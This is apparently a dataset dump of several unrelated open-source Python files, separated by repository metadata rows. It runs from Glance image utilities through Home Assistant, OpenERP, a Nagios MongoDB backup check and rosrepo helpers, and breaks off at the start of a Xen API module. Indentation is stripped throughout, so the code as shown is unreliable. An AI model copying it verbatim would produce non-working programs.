# streaming, which has readsize hardcoded to 8K, so this
# check should never fire. Regardless it still worths to
# make the check, as the code may be reused somewhere else.
if len(result) >= MAX_COOP_READER_BUFFER_SIZE:
raise exception.LimitExceeded()
self.position += len(chunk)
else:
try:
if self.iterator is None:
self.iterator = self.__iter__()
self.buffer = self.iterator.next()
self.position = 0
except StopIteration:
self.buffer = ''
self.position = 0
return str(result)
return str(result)
def __iter__(self):
return cooperative_iter(self.fd.__iter__())
class LimitingReader(object):
"""
Reader designed to fail when reading image data past the configured
allowable amount.
"""
def __init__(self, data, limit):
"""
:param data: Underlying image data object
:param limit: maximum number of bytes the reader should allow
"""
self.data = data
self.limit = limit
self.bytes_read = 0
def __iter__(self):
for chunk in self.data:
self.bytes_read += len(chunk)
if self.bytes_read > self.limit:
raise exception.ImageSizeLimitExceeded()
else:
yield chunk
def read(self, i):
result = self.data.read(i)
self.bytes_read += len(result)
if self.bytes_read > self.limit:
raise exception.ImageSizeLimitExceeded()
return result
def image_meta_to_http_headers(image_meta):
"""
Returns a set of image metadata into a dict
of HTTP headers that can be fed to either a Webob
Request object or an httplib.HTTP(S)Connection object
:param image_meta: Mapping of image metadata
"""
headers = {}
for k, v in image_meta.items():
if v is not None:
if k == 'properties':
for pk, pv in v.items():
if pv is not None:
headers["x-image-meta-property-%s"
% pk.lower()] = six.text_type(pv)
else:
headers["x-image-meta-%s" % k.lower()] = six.text_type(v)
return headers
def get_image_meta_from_headers(response):
"""
Processes HTTP headers from a supplied response that
match the x-image-meta and x-image-meta-property and
returns a mapping of image metadata and properties
:param response: Response to process
"""
result = {}
properties = {}
if hasattr(response, 'getheaders'): # httplib.HTTPResponse
headers = response.getheaders()
else: # webob.Response
headers = response.headers.items()
for key, value in headers:
key = str(key.lower())
if key.startswith('x-image-meta-property-'):
field_name = key[len('x-image-meta-property-'):].replace('-', '_')
properties[field_name] = value or None
elif key.startswith('x-image-meta-'):
field_name = key[len('x-image-meta-'):].replace('-', '_')
if 'x-image-meta-' + field_name not in IMAGE_META_HEADERS:
msg = _("Bad header: %(header_name)s") % {'header_name': key}
raise exc.HTTPBadRequest(msg, content_type="text/plain")
result[field_name] = value or None
result['properties'] = properties
for key, nullable in [('size', False), ('min_disk', False),
('min_ram', False), ('virtual_size', True)]:
if key in result:
try:
result[key] = int(result[key])
except ValueError:
if nullable and result[key] == str(None):
result[key] = None
else:
extra = (_("Cannot convert image %(key)s '%(value)s' "
"to an integer.")
% {'key': key, 'value': result[key]})
raise exception.InvalidParameterValue(value=result[key],
param=key,
extra_msg=extra)
if result[key] < 0 and result[key] is not None:
extra = _('Cannot be a negative value.')
raise exception.InvalidParameterValue(value=result[key],
param=key,
extra_msg=extra)
for key in ('is_public', 'deleted', 'protected'):
if key in result:
result[key] = strutils.bool_from_string(result[key])
return result
def create_mashup_dict(image_meta):
"""
Returns a dictionary-like mashup of the image core properties
and the image custom properties from given image metadata.
:param image_meta: metadata of image with core and custom properties
"""
def get_items():
for key, value in six.iteritems(image_meta):
if isinstance(value, dict):
for subkey, subvalue in six.iteritems(
create_mashup_dict(value)):
if subkey not in image_meta:
yield subkey, subvalue
else:
yield key, value
return dict(get_items())
def safe_mkdirs(path):
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def safe_remove(path):
try:
os.remove(path)
except OSError as e:
if e.errno != errno.ENOENT:
raise
class PrettyTable(object):
"""Creates an ASCII art table for use in bin/glance
Example:
ID Name Size Hits
--- ----------------- ------------ -----
122 image 22 0
"""
def __init__(self):
self.columns = []
def add_column(self, width, label="", just='l'):
"""Add a column to the table
:param width: number of characters wide the column should be
:param label: column heading
:param just: justification for the column, 'l' for left,
'r' for right
"""
self.columns.append((width, label, just))
def make_header(self):
label_parts = []
break_parts = []
for width, label, _ in self.columns:
# NOTE(sirp): headers are always left justified
label_part = self._clip_and_justify(label, width, 'l')
label_parts.append(label_part)
break_part = '-' * width
break_parts.append(break_part)
label_line = ' '.join(label_parts)
break_line = ' '.join(break_parts)
return '\n'.join([label_line, break_line])
def make_row(self, *args):
row = args
row_parts = []
for data, (width, _, just) in zip(row, self.columns):
row_part = self._clip_and_justify(data, width, just)
row_parts.append(row_part)
row_line = ' '.join(row_parts)
return row_line
@staticmethod
def _clip_and_justify(data, width, just):
# clip field to column width
clipped_data = str(data)[:width]
if just == 'r':
# right justify
justified = clipped_data.rjust(width)
else:
# left justify
justified = clipped_data.ljust(width)
return justified
def get_terminal_size():
def _get_terminal_size_posix():
import fcntl
import struct
import termios
height_width = None
try:
height_width = struct.unpack('hh', fcntl.ioctl(sys.stderr.fileno(),
termios.TIOCGWINSZ,
struct.pack('HH', 0, 0)))
except Exception:
pass
if not height_width:
try:
p = subprocess.Popen(['stty', 'size'],
shell=False,
stdout=subprocess.PIPE,
stderr=open(os.devnull, 'w'))
result = p.communicate()
if p.returncode == 0:
return tuple(int(x) for x in result[0].split())
except Exception:
pass
return height_width
def _get_terminal_size_win32():
try:
from ctypes import create_string_buffer
from ctypes import windll
handle = windll.kernel32.GetStdHandle(-12)
csbi = create_string_buffer(22)
res = windll.kernel32.GetConsoleScreenBufferInfo(handle, csbi)
except Exception:
return None
if res:
import struct
unpack_tmp = struct.unpack("hhhhHhhhhhh", csbi.raw)
(bufx, bufy, curx, cury, wattr,
left, top, right, bottom, maxx, maxy) = unpack_tmp
height = bottom - top + 1
width = right - left + 1
return (height, width)
else:
return None
def _get_terminal_size_unknownOS():
raise NotImplementedError
func = {'posix': _get_terminal_size_posix,
'win32': _get_terminal_size_win32}
height_width = func.get(platform.os.name, _get_terminal_size_unknownOS)()
if height_width is None:
raise exception.Invalid()
for i in height_width:
if not isinstance(i, int) or i <= 0:
raise exception.Invalid()
return height_width[0], height_width[1]
def mutating(func):
"""Decorator to enforce read-only logic"""
@functools.wraps(func)
def wrapped(self, req, *args, **kwargs):
if req.context.read_only:
msg = "Read-only access"
LOG.debug(msg)
raise exc.HTTPForbidden(msg, request=req,
content_type="text/plain")
return func(self, req, *args, **kwargs)
return wrapped
def setup_remote_pydev_debug(host, port):
error_msg = _LE('Error setting up the debug environment. Verify that the'
' option pydev_worker_debug_host is pointing to a valid '
'hostname or IP on which a pydev server is listening on'
' the port indicated by pydev_worker_debug_port.')
try:
try:
from pydev import pydevd
except ImportError:
import pydevd
pydevd.settrace(host,
port=port,
stdoutToServer=True,
stderrToServer=True)
return True
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(error_msg)
def validate_key_cert(key_file, cert_file):
try:
error_key_name = "private key"
error_filename = key_file
with open(key_file, 'r') as keyfile:
key_str = keyfile.read()
key = crypto.load_privatekey(crypto.FILETYPE_PEM, key_str)
error_key_name = "certificate"
error_filename = cert_file
with open(cert_file, 'r') as certfile:
cert_str = certfile.read()
cert = crypto.load_certificate(crypto.FILETYPE_PEM, cert_str)
except IOError as ioe:
raise RuntimeError(_("There is a problem with your %(error_key_name)s "
"%(error_filename)s. Please verify it."
" Error: %(ioe)s") %
{'error_key_name': error_key_name,
'error_filename': error_filename,
'ioe': ioe})
except crypto.Error as ce:
raise RuntimeError(_("There is a problem with your %(error_key_name)s "
"%(error_filename)s. Please verify it. OpenSSL"
" error: %(ce)s") %
{'error_key_name': error_key_name,
'error_filename': error_filename,
'ce': ce})
try:
data = str(uuid.uuid4())
digest = CONF.digest_algorithm
if digest == 'sha1':
LOG.warn('The FIPS (FEDERAL INFORMATION PROCESSING STANDARDS)'
' state that the SHA-1 is not suitable for'
' general-purpose digital signature applications (as'
' specified in FIPS 186-3) that require 112 bits of'
' security. The default value is sha1 in Kilo for a'
' smooth upgrade process, and it will be updated'
' with sha256 in next release(L).')
out = crypto.sign(key, data, digest)
crypto.verify(cert, out, data, digest)
except crypto.Error as ce:
raise RuntimeError(_("There is a problem with your key pair. "
"Please verify that cert %(cert_file)s and "
"key %(key_file)s belong together. OpenSSL "
"error %(ce)s") % {'cert_file': cert_file,
'key_file': key_file,
'ce': ce})
def get_test_suite_socket():
global GLANCE_TEST_SOCKET_FD_STR
if GLANCE_TEST_SOCKET_FD_STR in os.environ:
fd = int(os.environ[GLANCE_TEST_SOCKET_FD_STR])
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
if six.PY2:
sock = socket.SocketType(_sock=sock)
sock.listen(CONF.backlog)
del os.environ[GLANCE_TEST_SOCKET_FD_STR]
os.close(fd)
return sock
return None
def is_uuid_like(val):
"""Returns validation of a value as a UUID.
For our purposes, a UUID is a canonical form string:
aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa
"""
try:
return str(uuid.UUID(val)) == val
except (TypeError, ValueError, AttributeError):
return False
def is_valid_hostname(hostname):
"""Verify whether a hostname (not an FQDN) is valid."""
return re.match('^[a-zA-Z0-9-]+$', hostname) is not None
def is_valid_fqdn(fqdn):
"""Verify whether a host is a valid FQDN."""
return re.match('^[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$', fqdn) is not None
def parse_valid_host_port(host_port):
"""
Given a "host:port" string, attempts to parse it as intelligently as
possible to determine if it is valid. This includes IPv6 [host]:port form,
IPv4 ip:port form, and hostname:port or fqdn:port form.
Invalid inputs will raise a ValueError, while valid inputs will return
a (host, port) tuple where the port will always be of type int.
"""
try:
try:
host, port = netutils.parse_host_port(host_port)
except Exception:
raise ValueError(_('Host and port "%s" is not valid.') % host_port)
if not netutils.is_valid_port(port):
raise ValueError(_('Port "%s" is not valid.') % port)
# First check for valid IPv6 and IPv4 addresses, then a generic
# hostname. Failing those, if the host includes a period, then this
# should pass a very generic FQDN check. The FQDN check for letters at
# the tail end will weed out any hilariously absurd IPv4 addresses.
if not (netutils.is_valid_ipv6(host) or netutils.is_valid_ipv4(host) or
is_valid_hostname(host) or is_valid_fqdn(host)):
raise ValueError(_('Host "%s" is not valid.') % host)
except Exception as ex:
raise ValueError(_('%s '
'Please specify a host:port pair, where host is an '
'IPv4 address, IPv6 address, hostname, or FQDN. If '
'using an IPv6 address, enclose it in brackets '
'separately from the port (i.e., '
'"[fe80::a:b:c]:9876").') % ex)
return (host, int(port))
try:
REGEX_4BYTE_UNICODE = re.compile(u'[\U00010000-\U0010ffff]')
except re.error:
# UCS-2 build case
REGEX_4BYTE_UNICODE = re.compile(u'[\uD800-\uDBFF][\uDC00-\uDFFF]')
def no_4byte_params(f):
"""
Checks that no 4 byte unicode characters are allowed
in dicts' keys/values and string's parameters
"""
def wrapper(*args, **kwargs):
def _is_match(some_str):
return (isinstance(some_str, six.text_type) and
REGEX_4BYTE_UNICODE.findall(some_str) != [])
def _check_dict(data_dict):
# a dict of dicts has to be checked recursively
for key, value in six.iteritems(data_dict):
if isinstance(value, dict):
_check_dict(value)
else:
if _is_match(key):
msg = _("Property names can't contain 4 byte unicode.")
raise exception.Invalid(msg)
if _is_match(value):
msg = (_("%s can't contain 4 byte unicode characters.")
% key.title())
raise exception.Invalid(msg)
for data_dict in [arg for arg in args if isinstance(arg, dict)]:
_check_dict(data_dict)
# now check args for str values
for arg in args:
if _is_match(arg):
msg = _("Param values can't contain 4 byte unicode.")
raise exception.Invalid(msg)
# check kwargs as well, as params are passed as kwargs via
# registry calls
_check_dict(kwargs)
return f(*args, **kwargs)
return wrapper
def validate_mysql_int(*args, **kwargs):
"""
Make sure that all arguments are less than 2 ** 31 - 1.
This limitation is introduced because mysql stores INT in 4 bytes.
If the validation fails for some argument, exception.Invalid is raised with
appropriate information.
"""
max_int = (2 ** 31) - 1
for param in args:
if param > max_int:
msg = _("Value %(value)d out of range, "
"must not exceed %(max)d") % {"value": param,
"max": max_int}
raise exception.Invalid(msg)
for param_str in kwargs:
param = kwargs.get(param_str)
if param and param > max_int:
msg = _("'%(param)s' value out of range, "
"must not exceed %(max)d") % {"param": param_str,
"max": max_int}
raise exception.Invalid(msg)
def stash_conf_values():
"""
Make a copy of some of the current global CONF's settings.
Allows determining if any of these values have changed
when the config is reloaded.
"""
conf = {}
conf['bind_host'] = CONF.bind_host
conf['bind_port'] = CONF.bind_port
conf['tcp_keepidle'] = CONF.cert_file
conf['backlog'] = CONF.backlog
conf['key_file'] = CONF.key_file
conf['cert_file'] = CONF.cert_file
return conf
|
apache-2.0
| 29,378,260,714,325,270
| 34.078167
| 79
| 0.552059
| false
| 4.281625
| false
| false
| false
|
keitaroyam/yamtbx
|
cctbx_progs/dano_vs_d.py
|
1
|
1364
|
"""
Usage:
phenix.python dano_vs_d.py your.sca 20
"""
import iotbx.file_reader
from cctbx.array_family import flex
def run(hklin, n_bins):
for array in iotbx.file_reader.any_file(hklin).file_server.miller_arrays:
# skip if not anomalous intensity data
if not (array.is_xray_intensity_array() and array.anomalous_flag()):
print "skipping", array.info()
continue
# We assume that data is already merged
assert array.is_unique_set_under_symmetry()
# take anomalous differences
dano = array.anomalous_differences()
# process with binning
dano.setup_binner(n_bins=n_bins)
binner = dano.binner()
print "Array:", array.info()
print " dmax dmin nrefs dano"
for i_bin in binner.range_used():
# selection for this bin. sel is flex.bool object (list of True of False)
sel = binner.selection(i_bin)
# take mean of absolute value of anomalous differences in a bin
bin_mean = flex.mean(flex.abs(dano.select(sel).data()))
d_max, d_min = binner.bin_d_range(i_bin)
print "%7.2f %7.2f %6d %.2f" % (d_max, d_min, binner.count(i_bin), bin_mean)
# run()
if __name__ == "__main__":
import sys
hklin = sys.argv[1]
n_bins = int(sys.argv[2])
run(hklin, n_bins)
|
bsd-3-clause
| 3,833,057,630,944,875,500
| 31.47619
| 88
| 0.60044
| false
| 3.135632
| false
| false
| false
|
jamespcole/home-assistant
|
homeassistant/components/eight_sleep/binary_sensor.py
|
1
|
1832
|
"""Support for Eight Sleep binary sensors."""
import logging
from homeassistant.components.binary_sensor import BinarySensorDevice
from . import CONF_BINARY_SENSORS, DATA_EIGHT, NAME_MAP, EightSleepHeatEntity
_LOGGER = logging.getLogger(__name__)
DEPENDENCIES = ['eight_sleep']
async def async_setup_platform(hass, config, async_add_entities,
discovery_info=None):
"""Set up the eight sleep binary sensor."""
if discovery_info is None:
return
name = 'Eight'
sensors = discovery_info[CONF_BINARY_SENSORS]
eight = hass.data[DATA_EIGHT]
all_sensors = []
for sensor in sensors:
all_sensors.append(EightHeatSensor(name, eight, sensor))
async_add_entities(all_sensors, True)
class EightHeatSensor(EightSleepHeatEntity, BinarySensorDevice):
"""Representation of a Eight Sleep heat-based sensor."""
def __init__(self, name, eight, sensor):
"""Initialize the sensor."""
super().__init__(eight)
self._sensor = sensor
self._mapped_name = NAME_MAP.get(self._sensor, self._sensor)
self._name = '{} {}'.format(name, self._mapped_name)
self._state = None
self._side = self._sensor.split('_')[0]
self._userid = self._eight.fetch_userid(self._side)
self._usrobj = self._eight.users[self._userid]
_LOGGER.debug("Presence Sensor: %s, Side: %s, User: %s",
self._sensor, self._side, self._userid)
@property
def name(self):
"""Return the name of the sensor, if any."""
return self._name
@property
def is_on(self):
"""Return true if the binary sensor is on."""
return self._state
async def async_update(self):
"""Retrieve latest state."""
self._state = self._usrobj.bed_presence
|
apache-2.0
| -4,521,372,871,055,284,700
| 28.548387
| 77
| 0.622817
| false
| 3.832636
| false
| false
| false
|
iw3hxn/LibrERP
|
purchase_order_version/models/inherit_purchase_order_line.py
|
1
|
2019
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2004-2014 Didotech srl (<http://www.didotech.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import orm, fields
class purchase_order_line(orm.Model):
_inherit = "purchase.order.line"
_columns = {
# 'active': fields.related('order_id', 'active', type='boolean', string='Active', store=False),
'purchase_line_copy_id': fields.many2one('purchase.order.line', 'Orig version', required=False, readonly=False),
}
def copy_data(self, cr, uid, line_id, defaults=None, context=None):
context = context or self.pool['res.users'].context_get(cr, uid)
defaults = defaults or {}
if context.get('versioning', False):
defaults['purchase_line_copy_id'] = line_id
return super(purchase_order_line, self).copy_data(cr, uid, line_id, defaults, context)
def copy(self, cr, uid, line_id, default, context=None):
context = context or self.pool['res.users'].context_get(cr, uid)
default = default or {}
if context.get('versioning', False):
default['purchase_line_copy_id'] = line_id
return super(purchase_order_line, self).copy(cr, uid, line_id, default, context)
|
agpl-3.0
| 2,852,159,605,738,768,400
| 43.866667
| 120
| 0.616642
| false
| 3.966601
| false
| false
| false
|
Tealium/nagios
|
files/default/plugins/check_mongodb_backup.py
|
1
|
6143
|
#!/usr/bin/env python
desc = """
Checks the status of the most recent MongoDB backup or, with the --snap option,
checks that the snapshots for the most recent backup were completed.
"""
import kazoo
from kazoo.client import KazooClient
from kazoo.client import KazooState
import yaml
import argparse
import time
from datetime import datetime
from datetime import timedelta
class Status(dict):
def __init__(self, name, code, msg):
self.name = name
self.code = code
self.msg = msg
def exit(self):
print "%s - %s" % (self.name, self.msg)
raise SystemExit(self.code)
class OK(Status):
def __init__(self,msg):
super(OK,self).__init__('OK', 0, msg)
class WARNING(Status):
def __init__(self,msg):
super(WARNING,self).__init__('WARNING', 1, msg)
class CRITICAL(Status):
def __init__(self,msg):
super(CRITICAL,self).__init__('CRITICAL', 2, msg)
class UNKNOWN(Status):
def __init__(self,msg):
super(UNKNOWN,self).__init__('UNKNOWN', 3, msg)
def state_listener(state):
if state == KazooState.LOST:
error("zookeeper connection state was lost")
elif state == KazooState.SUSPENDED:
error("zookeeper connection state was suspended")
elif state == KazooState.CONNECTED:
pass
def create_date_path(days_ago):
when = datetime.utcnow()
if days_ago:
delta = timedelta(days=days_ago)
when = when - delta
return when.strftime("/%Y/%m/%d")
def look4abort(zk, days_ago=None):
day_node = args.prefix.rstrip('/') + '/' + args.env.rstrip('/') + create_date_path(days_ago)
if zk.exists(day_node):
hours = zk.retry(zk.get_children, day_node)
if len(hours):
hours.sort()
abort_node = day_node + '/' + str(hours[-1]) + '/ABORT'
if zk.exists(abort_node):
excuse = zk.retry(zk.get, abort_node)
return CRITICAL("found backup abort status: %s" % excuse[0])
else:
return OK('no abort during most recent backup')
else:
# Apparently no backups yet today. Let's check yesterday.
# Let's not explore infinity though...
if days_ago: return WARNING('found no backup info for past two days')
return look4abort(zk, 1)
else:
# Apparently no backups yet today. Let's check yesterday.
# Let's not explore infinity though...
if days_ago: return WARNING('found no backup info for past two days')
return look4abort(zk, 1)
def look4snaps(zk, days_ago=None):
import boto
import boto.ec2
import boto.utils
import chef
instance_id = boto.utils.get_instance_metadata()['instance-id']
if args.region:
region_spec = args.region
else:
region_spec = boto.utils.get_instance_identity()['document']['region']
chef_api = chef.autoconfigure()
node = chef.Node(instance_id)
my_app_env = node.attributes['app_environment']
bag = chef.DataBag('aws')
item = bag[my_app_env]
key_id = str(item['aws_access_key_id'])
key_secret = str(item['aws_secret_access_key'])
region = boto.ec2.get_region(region_spec, aws_access_key_id=key_id, aws_secret_access_key=key_secret)
conn = region.connect(aws_access_key_id=key_id, aws_secret_access_key=key_secret)
day_node = args.prefix.rstrip('/') + '/' + args.env.rstrip('/') + create_date_path(days_ago)
if zk.exists(day_node):
hours = zk.retry(zk.get_children, day_node)
if len(hours):
hours.sort()
shards_parent_node = day_node + '/' + str(hours[-1]) + '/mongodb_shard_server'
if zk.exists(shards_parent_node):
shard_list = zk.retry(zk.get_children, shards_parent_node)
if len(shard_list) > 0:
msg = ''
err = 0
for shard in shard_list:
shard_data = zk.retry(zk.get, shards_parent_node + '/' + shard)
snaps = conn.get_all_snapshots(eval(shard_data[0]))
msg = msg + ", %s [" % shard
snap_text = ''
for snap in snaps:
if snap.status == 'error': err = 1
snap_text = snap_text + ", %s (%s)" % (str(snap), snap.status)
msg = msg + snap_text.strip(', ') + ']'
if err:
return CRITICAL(msg.strip(', '))
return OK(msg.strip(', '))
# Apparently no backups yet today. Let's check yesterday.
# Let's not explore infinity though...
if days_ago: return WARNING('found no backup info for past two days')
return look4snaps(zk, 1)
if __name__ == '__main__':
gargle = argparse.ArgumentParser(prog = "check_mongodb_backup", description=desc,
usage='%(prog)s [options]',
formatter_class = argparse.RawDescriptionHelpFormatter)
gargle.add_argument('--prefix', dest="prefix", metavar="<path_prefix>", default='/backup/mongodb_cluster/',
help='ZooKeeper path prefix (default: /backup/mongodb_cluster/)')
gargle.add_argument('--cluster', dest="env", metavar="<cluster_id>", default='production',
help='MongoDB cluster name (default: production)')
gargle.add_argument('--config', dest='yaml', metavar="<config_file>",
help='ZooKeeper server list file (default: /etc/zookeeper/server_list.yml)',
default='/etc/zookeeper/server_list.yml')
gargle.add_argument('--region', metavar="<aws-region-spec>",
help='AWS region where the snapshots are stored (default: region of host instance)')
gargle.add_argument('--snaps', action='store_true',
help='check snapshots from most recent backup (default: False)')
args = gargle.parse_args()
try:
y = yaml.safe_load(open(args.yaml))
servers = ','.join("%s:%s" % (s['host'],s['port']) for s in y['zookeepers'])
zk = KazooClient(hosts=servers)
zk.start()
zk.add_listener(state_listener)
if args.snaps:
status = look4snaps(zk)
else:
status = look4abort(zk)
zk.remove_listener(state_listener)
zk.stop()
status.exit()
except Exception as e:
UNKNOWN("Error: %s" % e).exit()
|
apache-2.0
| 3,951,950,523,133,966,300
| 27.178899
| 110
| 0.608335
| false
| 3.480453
| false
| false
| false
|
fkie/rosrepo
|
src/rosrepo/util.py
|
1
|
6206
|
# coding=utf-8
#
# ROSREPO
# Manage ROS workspaces with multiple Gitlab repositories
#
# Author: Timo Röhling
#
# Copyright 2016 Fraunhofer FKIE
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
import os
import fcntl
import termios
import struct
import multiprocessing
import signal
from tempfile import mkstemp
from subprocess import Popen, PIPE
from yaml import load as yaml_load_impl, dump as yaml_dump_impl, YAMLError
try:
from yaml import CSafeLoader as SafeLoader, CSafeDumper as SafeDumper
except ImportError:
from yaml import SafeLoader, SafeDumper
def yaml_load(stream, Loader=SafeLoader):
return yaml_load_impl(stream, Loader=Loader)
def yaml_dump(data, stream=None, Dumper=SafeDumper, **kwargs):
return yaml_dump_impl(data, stream=stream, Dumper=Dumper, **kwargs)
class NamedTuple(object):
__slots__ = ()
def __init__(self, *args, **kwargs):
slots = self.__slots__
for k in slots:
setattr(self, k, kwargs.get(k))
if args:
for k, v in zip(slots, args):
setattr(self, k, v)
def __str__(self):
clsname = self.__class__.__name__
values = ", ".join("%s=%r" % (k, getattr(self, k)) for k in self.__slots__)
return "%s(%s)" % (clsname, values)
__repr__ = __str__
def __getitem__(self, item):
return getattr(self, self.__slots__[item])
def __setitem__(self, item, value):
return setattr(self, self.__slots__[item], value)
def __len__(self):
return len(self.__slots__)
try:
iteritems = dict.iteritems
except AttributeError:
iteritems = dict.items
class UserError(RuntimeError):
pass
def is_deprecated_package(manifest):
deprecated = next((e for e in manifest.exports if e.tagname == "deprecated"), None)
return deprecated is not None
def deprecated_package_info(manifest):
deprecated = next((e for e in manifest.exports if e.tagname == "deprecated"), None)
return deprecated.content if deprecated is not None else None
def path_has_prefix(path, prefix):
p = os.path.normpath(path)
q = os.path.normpath(prefix)
if p == q:
return True
head, tail = os.path.split(p)
while tail != "":
if head == q:
return True
head, tail = os.path.split(head)
return False
def has_package_path(obj, paths):
for path in paths:
if path_has_prefix(path, obj.workspace_path if hasattr(obj, "workspace_path") else obj):
return True
return False
def env_path_list_contains(path_list, path):
if path_list not in os.environ:
return False
paths = os.environ[path_list].split(os.pathsep)
return path in paths
def makedirs(path):
if not os.path.isdir(path):
os.makedirs(path)
def write_atomic(filepath, data, mode=0o644, ignore_fail=False):
try:
fd, filepath_tmp = mkstemp(prefix=os.path.basename(filepath) + ".tmp.", dir=os.path.dirname(filepath))
os.fchmod(fd, mode)
with os.fdopen(fd, "wb") as f:
f.write(data)
os.rename(filepath_tmp, filepath)
except (IOError, OSError):
if not ignore_fail:
raise
def isatty(fd):
return hasattr(fd, "isatty") and fd.isatty()
_cached_terminal_size = None
def get_terminal_size():
global _cached_terminal_size
if _cached_terminal_size is not None:
return _cached_terminal_size
try:
with open(os.ctermid(), "rb") as f:
cr = struct.unpack('hh', fcntl.ioctl(f.fileno(), termios.TIOCGWINSZ, '1234'))
except (IOError, struct.error):
raise OSError("Cannot determine terminal size")
_cached_terminal_size = int(cr[1]), int(cr[0])
return _cached_terminal_size
def find_program(program):
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
fpath = path.strip('"')
candidate = os.path.join(fpath, fname)
if is_exe(candidate):
return candidate
return None
def getmtime(path):
return os.path.getmtime(path) if os.path.exists(path) else 0
def call_process(args, bufsize=0, stdin=None, stdout=None, stderr=None, cwd=None, env=None, input_data=None):
p = Popen(args, bufsize=bufsize, stdin=stdin, stdout=stdout, stderr=stderr, cwd=cwd, env=env)
if stdin == PIPE or stdout == PIPE or stderr == PIPE:
stdoutdata, stderrdata = p.communicate(input_data.encode("UTF-8") if input_data else None)
return p.returncode, stdoutdata.decode("UTF-8") if stdoutdata is not None else None, stderrdata.decode("UTF-8") if stderrdata is not None else None
else:
p.wait()
return p.returncode
def create_multiprocess_manager():
return multiprocessing.Manager()
def _worker_init(worker_init, worker_init_args):
signal.signal(signal.SIGINT, signal.SIG_IGN)
if worker_init is not None:
worker_init(*worker_init_args)
def run_multiprocess_workers(worker, workload, worker_init=None, worker_init_args=(), jobs=None, timeout=None):
if not workload:
return []
if timeout is None:
timeout = 999999999 # Workaround for KeyboardInterrupt
pool = multiprocessing.Pool(processes=jobs, initializer=_worker_init, initargs=(worker_init, worker_init_args))
try:
result_obj = pool.map_async(worker, workload)
pool.close()
result = result_obj.get(timeout=timeout)
return result
except:
pool.terminate()
raise
finally:
pool.join()
|
apache-2.0
| 8,527,631,097,278,525,000
| 28.131455
| 155
| 0.652538
| false
| 3.645711
| false
| false
| false
|
Hearen/OnceServer
|
pool_management/bn-xend-core/xend/BNVMAPI.py
|
1
|
374814
|
import traceback
import inspect
import os
import Queue
import string
import sys
import threading
import time
import xmlrpclib
import socket
import struct
import copy
import re
import XendDomain, XendDomainInfo, XendNode, XendDmesg, XendConfig
import XendLogging, XendTaskManager, XendAPIStore, XendIOController
from xen.xend.BNPoolAPI import BNPoolAPI
from xen.util.xmlrpcclient import ServerProxy
from xen.xend import uuid as genuuid
from XendLogging import log
from XendNetwork import XendNetwork
from XendError import *
from XendTask import XendTask
from xen.util import ip as getip
from xen.util import Netctl
from xen.xend import sxp
from xen.xend.XendCPUPool import XendCPUPool
from XendAuthSessions import instance as auth_manager
from xen.util.xmlrpclib2 import stringify
from xen.util import xsconstants
from xen.util.xpopen import xPopen3
from xen.xend.XendConstants import DOM_STATE_HALTED, DOM_STATE_PAUSED
from xen.xend.XendConstants import DOM_STATE_RUNNING, DOM_STATE_SUSPENDED
from xen.xend.XendConstants import DOM_STATE_SHUTDOWN, DOM_STATE_UNKNOWN
from xen.xend.XendConstants import DOM_STATE_CRASHED, HVM_PARAM_ACPI_S_STATE
from xen.xend.XendConstants import VDI_DEFAULT_STRUCT, VDI_DEFAULT_SR_TYPE, VDI_DEFAULT_DIR
from xen.xend.XendConstants import FAKE_MEDIA_PATH, FAKE_MEDIA_NAME
from xen.xend.XendConstants import CD_VBD_DEFAULT_STRUCT, DEFAULT_HA_PATH
from xen.xend.XendConstants import CACHED_CONFIG_FILE
from XendAPIConstants import *
from xen.xend.ConfigUtil import getConfigVar
GB = 1024 * 1024 * 1024
if getConfigVar('compute', 'VM', 'disk_limit'):
DISK_LIMIT = int(getConfigVar('compute', 'VM', 'disk_limit'))
else:
DISK_LIMIT = 6
if getConfigVar('compute', 'VM', 'interface_limit'):
INTERFACE_LIMIT = int(getConfigVar('compute', 'VM', 'interface_limit'))
else:
INTERFACE_LIMIT = 6
if getConfigVar('virtualization', 'DOM0', 'reserved_mem_gb'):
RESERVED_MEM = int(getConfigVar('virtualization', 'DOM0', 'reserved_mem_gb')) * GB
else:
RESERVED_MEM = 4 * GB
try:
set
except NameError:
from sets import Set as set
reload(sys)
sys.setdefaultencoding( "utf-8" )
DOM0_UUID = "00000000-0000-0000-0000-000000000000"
argcounts = {}
def doexec(args, inputtext=None):
"""Execute a subprocess, then return its return code, stdout and stderr"""
proc = xPopen3(args, True)
if inputtext != None:
proc.tochild.write(inputtext)
stdout = proc.fromchild
stderr = proc.childerr
rc = proc.wait()
return (rc, stdout, stderr)
# ------------------------------------------
# Utility Methods for Xen API Implementation
# ------------------------------------------
def xen_api_success(value):
"""Wraps a return value in XenAPI format."""
if value is None:
s = ''
else:
s = stringify(value)
return {"Status": "Success", "Value": s}
def xen_api_success_void():
"""Return success, but caller expects no return value."""
return xen_api_success("")
def xen_api_error(error):
"""Wraps an error value in XenAPI format."""
if type(error) == tuple:
error = list(error)
if type(error) != list:
error = [error]
if len(error) == 0:
error = ['INTERNAL_ERROR', 'Empty list given to xen_api_error']
return { "Status": "Failure",
"ErrorDescription": [str(x) for x in error] }
def xen_rpc_call(ip, method, *args):
"""wrap rpc call to a remote host"""
try:
if not ip:
